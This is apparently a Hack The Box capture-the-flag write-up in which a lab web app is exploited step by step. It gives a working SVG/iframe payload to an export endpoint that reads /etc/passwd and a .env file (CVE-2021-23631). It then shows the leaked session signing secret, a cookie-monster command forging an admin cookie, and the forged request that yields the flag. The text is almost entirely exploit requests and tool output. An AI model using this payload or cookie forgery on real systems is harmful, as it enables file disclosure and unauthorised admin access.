Got a way to read local files via the SVG-to-PNG export (LFI, CVE-2021-23631):
POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.175.87:30484/dashboard
Content-Type: application/json
Origin: http://138.68.175.87:30484
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>"}
Got the secret used to sign/verify the session cookie from /app/.env:
SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db
Used cookie-monster to generate the cookie:
root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Burp Repeater:
GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.150.120:31876/
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1
The flag is in the page source of the response:
var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'